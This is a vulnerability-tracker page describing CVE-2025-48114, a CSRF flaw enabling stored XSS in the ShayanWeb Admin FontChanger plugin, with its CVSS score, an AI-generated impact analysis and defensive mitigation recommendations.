Skip to main content

CVE-2025-48114: CWE-352 Cross-Site Request Forgery (CSRF) in Shayan Farhang Pazhooh ShayanWeb Admin FontChanger

High
VulnerabilityCVE-2025-48114cvecve-2025-48114cwe-352
Published: Fri May 16 2025 (05/16/2025, 15:45:07 UTC)
Source: CVE
Vendor/Project: Shayan Farhang Pazhooh
Product: ShayanWeb Admin FontChanger

Description

Cross-Site Request Forgery (CSRF) vulnerability in Shayan Farhang Pazhooh ShayanWeb Admin FontChanger allows Stored XSS. This issue affects ShayanWeb Admin FontChanger: from n/a through 1.8.1.

AI-Powered Analysis

AILast updated: 07/11/2025, 23:02:32 UTC

Technical Analysis

CVE-2025-48114 is a high-severity vulnerability classified as CWE-352, indicating a Cross-Site Request Forgery (CSRF) issue in the ShayanWeb Admin FontChanger product developed by Shayan Farhang Pazhooh. This vulnerability affects versions up to 1.8.1. The core problem is that the application does not adequately verify the authenticity of requests made by authenticated users, allowing attackers to trick users into submitting unauthorized requests. The CSRF vulnerability in this context enables an attacker to perform actions on behalf of a legitimate user without their consent, specifically leading to Stored Cross-Site Scripting (XSS). Stored XSS means that malicious scripts injected by an attacker are permanently stored on the target server (e.g., in a database or persistent configuration) and executed in the context of other users’ browsers when they access the affected resource. The CVSS 3.1 score of 7.1 reflects a high severity, with the vector indicating that the attack can be performed remotely (AV:N), requires low attack complexity (AC:L), no privileges (PR:N), but does require user interaction (UI:R). The scope is changed (S:C), meaning the vulnerability affects resources beyond the initially vulnerable component. The impact includes low confidentiality, integrity, and availability impacts individually, but combined they can lead to significant compromise of user sessions and data integrity. No known exploits are currently reported in the wild, and no patches have been published yet. However, the presence of stored XSS via CSRF can allow attackers to steal session tokens, perform unauthorized actions, or spread malware within the user base of the affected application.

Potential Impact

For European organizations using ShayanWeb Admin FontChanger, this vulnerability poses a significant risk to web application security. The stored XSS resulting from CSRF can lead to session hijacking, unauthorized administrative actions, and potential data leakage. This can compromise the confidentiality of sensitive information, integrity of website content, and availability if attackers manipulate administrative functions. Organizations in sectors such as government, finance, healthcare, and critical infrastructure that rely on this product for web administration could face reputational damage, regulatory penalties under GDPR for data breaches, and operational disruptions. The attack requires user interaction but no authentication, meaning even non-privileged users or external attackers can exploit it by tricking legitimate users into executing malicious requests. This broadens the attack surface and increases the likelihood of successful exploitation. The lack of patches means organizations must rely on mitigation strategies until an official fix is released.

Mitigation Recommendations

1. Implement strict CSRF protections immediately, such as synchronizer tokens or double-submit cookies, to validate the authenticity of requests. 2. Employ Content Security Policy (CSP) headers to reduce the impact of stored XSS by restricting script execution sources. 3. Conduct thorough input validation and output encoding on all user-supplied data to prevent script injection. 4. Restrict administrative interface access using network-level controls (e.g., VPN, IP whitelisting) to limit exposure. 5. Educate users about phishing and social engineering tactics that could trigger CSRF attacks. 6. Monitor web application logs for unusual POST requests or parameter changes indicative of exploitation attempts. 7. Apply web application firewalls (WAFs) with rules targeting CSRF and XSS attack patterns as a temporary protective measure. 8. Plan for rapid deployment of patches once available from the vendor. 9. Review and update session management policies to minimize session fixation and hijacking risks. These steps go beyond generic advice by focusing on layered defenses, user awareness, and proactive monitoring tailored to the specific nature of this vulnerability.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
Patchstack
Date Reserved
2025-05-15T18:01:15.809Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682cd0f91484d88663aebd68

Added to database: 5/20/2025, 6:59:05 PM

Last enriched: 7/11/2025, 11:02:32 PM

Last updated: 7/31/2025, 12:01:16 PM

Views: 8

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats